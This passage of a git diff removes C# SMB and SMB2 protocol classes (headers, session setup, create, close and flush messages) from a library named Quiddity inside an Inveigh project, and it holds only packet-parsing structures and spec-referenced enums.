base.Write(data); - } - - public void StringWrite(string String) - { - byte[] data = Encoding.UTF8.GetBytes(String); - base.Write(data); - } - - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/SMB/Commands/SMBCOMSessionSetupAndXRequest.cs b/Inveigh/Protocols/Quiddity/Protocols/SMB/Commands/SMBCOMSessionSetupAndXRequest.cs deleted file mode 100644 index 7130014..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/SMB/Commands/SMBCOMSessionSetupAndXRequest.cs +++ /dev/null @@ -1,92 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using System; -using System.Collections.Generic; -using System.IO; -using System.Linq; -using System.Text; - -namespace Quiddity.SMB -{ - class SMBCOMSessionSetupAndXRequest - { - // https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb/a00d0361-3544-4845-96ab-309b4bb7705d - public byte WordCount { get; set; } - public byte AndXCommand { get; set; } - public byte AndXReserved { get; set; } - public ushort AndXOffset { get; set; } - public ushort MaxBufferSize { get; set; } - public ushort MaxMpxCount { get; set; } - public ushort VcNumber { get; set; } - public uint SessionKey { get; set; } - public ushort SecurityBlobLength { get; set; } - public uint Reserved { get; set; } - public uint Capabilities { get; set; } - public ushort ByteCount { get; set; } - public byte[] SecurityBlob { get; set; } - - public SMBCOMSessionSetupAndXRequest() - { - - } - - public SMBCOMSessionSetupAndXRequest(byte[] data, int offset) - { - ReadBytes(data, offset); - } - - public void ReadBytes(byte[] data, int offset) - { - - using (MemoryStream memoryStream = new MemoryStream(data)) - { - PacketReader packetReader = new PacketReader(memoryStream); - memoryStream.Position = offset; - this.WordCount = packetReader.ReadByte(); - this.AndXCommand = packetReader.ReadByte(); - this.AndXReserved = packetReader.ReadByte(); - this.AndXOffset = packetReader.ReadUInt16(); - this.MaxBufferSize = packetReader.ReadUInt16(); - this.MaxMpxCount = packetReader.ReadUInt16(); - this.VcNumber = packetReader.ReadUInt16(); - this.SessionKey = packetReader.ReadUInt32(); - this.SecurityBlobLength = packetReader.ReadUInt16(); - this.Reserved = packetReader.BigEndianReadUInt32(); - this.Capabilities = packetReader.ReadUInt32(); - this.ByteCount = packetReader.ReadUInt16(); - this.SecurityBlob = packetReader.ReadBytes(this.SecurityBlobLength); - } - - } - - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/SMB/Commands/SMBCOMSessionSetupAndXResponse.cs b/Inveigh/Protocols/Quiddity/Protocols/SMB/Commands/SMBCOMSessionSetupAndXResponse.cs deleted file mode 100644 index 216162e..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/SMB/Commands/SMBCOMSessionSetupAndXResponse.cs +++ /dev/null @@ -1,91 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using System; -using System.Collections.Generic; -using System.IO; -using System.Linq; -using System.Text; - -namespace Quiddity.SMB -{ - class SMBCOMSessionSetupAndXResponse - { - // https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb/e5a467bc-cd36-4afa-825e-3f2a7bfd6189 - public byte WordCount { get; set; } - public byte AndXCommand { get; set; } - public byte AndXReserved { get; set; } - public ushort AndXOffset { get; set; } - public ushort Action { get; set; } - public ushort SecurityBlobLength { get; set; } - public ushort ByteCount { get; set; } - public byte[] SecurityBlob { get; set; } - - public SMBCOMSessionSetupAndXResponse() - { - - } - - public SMBCOMSessionSetupAndXResponse(byte[] data, int offset) - { - ReadBytes(data, offset); - } - - public void ReadBytes(byte[] data, int offset) - { - - using (MemoryStream memoryStream = new MemoryStream(data)) - { - PacketReader packetReader = new PacketReader(memoryStream); - memoryStream.Position = offset; - this.WordCount = packetReader.ReadByte(); - - if (this.WordCount != 0) - { - this.AndXCommand = packetReader.ReadByte(); - this.AndXReserved = packetReader.ReadByte(); - this.AndXOffset = packetReader.ReadUInt16(); - this.Action = packetReader.ReadUInt16(); - this.SecurityBlobLength = packetReader.ReadUInt16(); - } - - this.ByteCount = packetReader.ReadUInt16(); - - if (this.WordCount != 0) - { - this.SecurityBlob = packetReader.ReadBytes(SecurityBlobLength); - } - - } - - } - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/SMB/SMBHeader.cs b/Inveigh/Protocols/Quiddity/Protocols/SMB/SMBHeader.cs deleted file mode 100644 index 9704220..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/SMB/SMBHeader.cs +++ /dev/null @@ -1,93 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using System.IO; - -namespace Quiddity.SMB -{ - //https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-cifs/69a29f73-de0c-45a6-a1aa-8ceeea42217f - - class SMBHeader - { - public byte[] Protocol { get; set; } - public byte Command { get; set; } - public uint Status { get; set; } - public byte Flags { get; set; } - public ushort Flags2 { get; set; } - public ushort PIDHigh { get; set; } - public byte[] SecurityFeatures { get; set; } - public ushort Reserved { get; set; } - public ushort TID { get; set; } - public ushort PIDLow { get; set; } - public ushort UID { get; set; } - public ushort MID { get; set; } - - public SMBHeader() - { - this.Protocol = new byte[4] { 0xff, 0x53, 0x4d, 0x42 }; - } - - public SMBHeader(byte[] data) - { - ReadBytes(data, 0); - } - - public SMBHeader (byte[] data, int offset) - { - ReadBytes(data, offset); - } - - public void ReadBytes(byte[] data, int offset) - { - - using (MemoryStream memoryStream = new MemoryStream(data)) - { - PacketReader packetReader = new PacketReader(memoryStream); - memoryStream.Position = offset; - this.Protocol = packetReader.ReadBytes(4); - this.Command = packetReader.ReadByte(); - this.Status = packetReader.BigEndianReadUInt32(); - this.Flags = packetReader.ReadByte(); - this.Flags2 = packetReader.BigEndianReadUInt16(); - this.PIDHigh = packetReader.BigEndianReadUInt16(); - this.SecurityFeatures = packetReader.ReadBytes(8); - this.Reserved = packetReader.BigEndianReadUInt16(); - this.TID = packetReader.BigEndianReadUInt16(); - this.PIDLow = packetReader.BigEndianReadUInt16(); - this.UID = packetReader.BigEndianReadUInt16(); - this.MID = packetReader.BigEndianReadUInt16(); - } - - } - - } - -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/SMB/SMBHelper.cs b/Inveigh/Protocols/Quiddity/Protocols/SMB/SMBHelper.cs deleted file mode 100644 index 32f4309..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/SMB/SMBHelper.cs +++ /dev/null @@ -1,70 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using System.IO; - -namespace Quiddity.SMB -{ - class SMBHelper - { - public byte[] Protocol { get; set; } - - public SMBHelper() - { - this.Protocol = new byte[4]; - } - - public SMBHelper(byte[] data) - { - ReadBytes(data, 0); - } - - public SMBHelper(byte[] data, int offset) - { - ReadBytes(data, offset); - } - - public SMBHelper ReadBytes(byte[] data, int offset) - { - - using (MemoryStream memoryStream = new MemoryStream(data)) - { - PacketReader packetReader = new PacketReader(memoryStream); - memoryStream.Position = offset; - this.Protocol = packetReader.ReadBytes(4); - return this; - } - - } - - } - -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2CloseRequest.cs b/Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2CloseRequest.cs deleted file mode 100644 index bbe6926..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2CloseRequest.cs +++ /dev/null @@ -1,47 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using System; -using System.Collections.Generic; -using System.Linq; -using System.Text; - -namespace Quiddity.SMB2 -{ - class SMB2CloseRequest - { - // https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/f84053b0-bcb2-4f85-9717-536dae2b02bd - public ushort StructureSize { get; set; } - public byte[] Flags { get; set; } - public byte[] Reserved { get; set; } - public byte[] Field { get; set; } - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2CloseResponse.cs b/Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2CloseResponse.cs deleted file mode 100644 index 3d9b341..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2CloseResponse.cs +++ /dev/null @@ -1,54 +0,0 @@ - -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using System; -using System.Collections.Generic; -using System.Linq; -using System.Text; - -namespace Quiddity.SMB2 -{ - class SMB2CloseResponse - { - // https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/c0c15c57-3f3e-452b-b51c-9cc650a13f7b - public ushort StructureSize { get; set; } - public byte[] Flags { get; set; } - public byte[] Reserved { get; set; } - public byte[] CreationTime { get; set; } - public byte[] LastAccessTime { get; set; } - public byte[] LastWriteTime { get; set; } - public byte[] ChangeTime { get; set; } - public byte[] AllocationSize { get; set; } - public byte[] EndofFile { get; set; } - public byte[] FileAttributes { get; set; } - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2CreateRequest.cs b/Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2CreateRequest.cs deleted file mode 100644 index 7fd4d42..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2CreateRequest.cs +++ /dev/null @@ -1,120 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using System; -using System.Collections.Generic; -using System.Linq; -using System.Text; -using Quiddity.SMB2; - -namespace Quiddity.SMB2 -{ - // https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/e8fb45c1-a03d-44ca-b7ae-47385cfd7997 - enum RequestedOplockLevel : byte - { - SMB2_OPLOCK_LEVEL_NONE = 0x00, - SMB2_OPLOCK_LEVEL_II = 0x01, - SMB2_OPLOCK_LEVEL_EXCLUSIVE = 0x08, - SMB2_OPLOCK_LEVEL_BATCH = 0x09, - SMB2_OPLOCK_LEVEL_LEASE = 0xFF - } - - enum ImpersonationLevel : uint - { - Anonymous = 0x00000000, - Identification = 0x00000001, - Impersonation = 0x00000002, - Delegate = 0x00000003 - } - - enum ShareAccess : uint - { - FILE_SHARE_READ = 0x00000000, - FILE_SHARE_WRITE = 0x0000002, - FILE_SHARE_DELETE = 0x00000004 - } - - enum CreateDisposition : uint - { - FILE_SUPERSEDE = 0x00000000, - FILE_OPEN = 0x0000001, - FILE_CREATE = 0x00000002, - FILE_OPEN_IF = 0x00000003, - FILE_OVERWRITE = 0x00000004, - FILE_OVERWRITE_IF = 0x00000005 - } - - enum CreateOptions : uint - { - FILE_DIRECTORY_FILE = 0x00000000, - FILE_WRITE_THROUGH = 0x0000001, - FILE_SEQUENTIAL_ONLY = 0x00000004, - FILE_NO_INTERMEDIATE_BUFFERING = 0x00000008, - FILE_SYNCHRONOUS_IO_ALERT = 0x00000010, - FILE_SYNCHRONOUS_IO_NONALERT = 0x00000020, - FILE_NON_DIRECTORY_FILE = 0x00000040, - FILE_COMPLETE_IF_OPLOCKED = 0x00000100, - FILE_NO_EA_KNOWLEDGE = 0x00000200, - FILE_RANDOM_ACCESS = 0x00000800, - FILE_DELETE_ON_CLOSE = 0x00001000, - FILE_OPEN_BY_FILE_ID = 0x00002000, - FILE_OPEN_FOR_BACKUP_INTENT = 0x00004000, - FILE_NO_COMPRESSION = 0x00008000, - FILE_OPEN_REMOTE_INSTANCE = 0x00000400, - FILE_OPEN_REQUIRING_OPLOCK = 0x00010000, - FILE_DISALLOW_EXCLUSIVE = 0x00020000, - FILE_RESERVE_OPFILTER = 0x00100000, - FILE_OPEN_REPARSE_POINT = 0x00200000, - FILE_OPEN_NO_RECALL = 0x00400000, - FILE_OPEN_FOR_FREE_SPACE_QUERY = 0x00800000 - } - - class SMB2CreateRequest - { - // https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/e8fb45c1-a03d-44ca-b7ae-47385cfd7997 - public ushort StructureSize { get; set; } - public byte Flags { get; set; } - public byte RequestedOplockLevel { get; set; } - public uint ImpersonationLevel { get; set; } - public byte[] SmbCreateFlags { get; set; } - public byte[] Reserved { get; set; } - public byte[] DesiredAccess { get; set; } - public byte[] FileAttributes { get; set; } - public uint ShareAccess { get; set; } - public uint CreateDisposition { get; set; } - public uint CreateOptions { get; set; } - public ushort NameOffset { get; set; } - public ushort NameLength { get; set; } - public uint CreateContextsOffset { get; set; } - public uint CreateContextsLength { get; set; } - public byte[] Buffer { get; set; } - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2CreateResponse.cs b/Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2CreateResponse.cs deleted file mode 100644 index 3d63d60..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2CreateResponse.cs +++ /dev/null @@ -1,45 +0,0 @@ -using System; -using System.Collections.Generic; -using System.Linq; -using System.Text; - -namespace Quiddity.SMB2 -{ - enum OplockLevel : uint - { - SMB2_OPLOCK_LEVEL_NONE = 0x00, - SMB2_OPLOCK_LEVEL_II = 0x01, - SMB2_OPLOCK_LEVEL_EXCLUSIVE = 0x08, - SMB2_OPLOCK_LEVEL_BATCH = 0x09, - SMB2_OPLOCK_LEVEL_LEASE = 0xFF - } - - enum CreateAction : uint - { - FILE_SUPERSEDED = 0x00000000, - FILE_OPENED = 0x00000001, - FILE_CREATED = 0x00000002, - FILE_OVERWRITTEN = 0x00000003 - } - - class SMB2CreateResponse - { - // https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/d166aa9e-0b53-410e-b35e-3933d8131927 - public ushort StructureSize { get; set; } - public byte OplockLevel { get; set; } - public byte Flags { get; set; } - public uint CreateAction { get; set; } - public byte[] CreationTime { get; set; } - public byte[] LastAccessTime { get; set; } - public byte[] LastWriteTime { get; set; } - public byte[] ChangeTime { get; set; } - public byte[] AllocationSize { get; set; } - public byte[] EndofFile { get; set; } - public byte[] FileAttributes { get; set; } - public byte[] Reserved2 { get; set; } - public byte[] Field { get; set; } - public uint CreateContextsOffset { get; set; } - public uint CreateContextsLength { get; set; } - public byte[] Buffer { get; set; } - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2ErrorResponse.cs b/Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2ErrorResponse.cs deleted file mode 100644 index 02d66a4..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2ErrorResponse.cs +++ /dev/null @@ -1,48 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using System; -using System.Collections.Generic; -using System.Linq; -using System.Text; - -namespace Quiddity.SMB2 -{ - class SMB2ErrorResponse - { - // https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/d4da8b67-c180-47e3-ba7a-d24214ac4aaa - public ushort StructureSize { get; set; } - public byte ErrorContextCount { get; set; } - public byte Reserved { get; set; } - public uint ByteCount { get; set; } - public byte[] ErrorData { get; set; } - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2FlushRequest.cs b/Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2FlushRequest.cs deleted file mode 100644 index ead7b7a..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2FlushRequest.cs +++ /dev/null @@ -1,47 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using System; -using System.Collections.Generic; -using System.Linq; -using System.Text; - -namespace Quiddity.SMB2 -{ - class SMB2FlushRequest - { - // https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/e494678b-b1fc-44a0-b86e-8195acf74ad7 - public ushort StructureSize { get; set; } - public ushort Reserved1 { get; set; } - public uint Reserved2 { get; set; } - public byte[] FileId { get; set; } - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2FlushResponse.cs b/Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2FlushResponse.cs deleted file mode 100644 index cf48f1e..0000000 --- 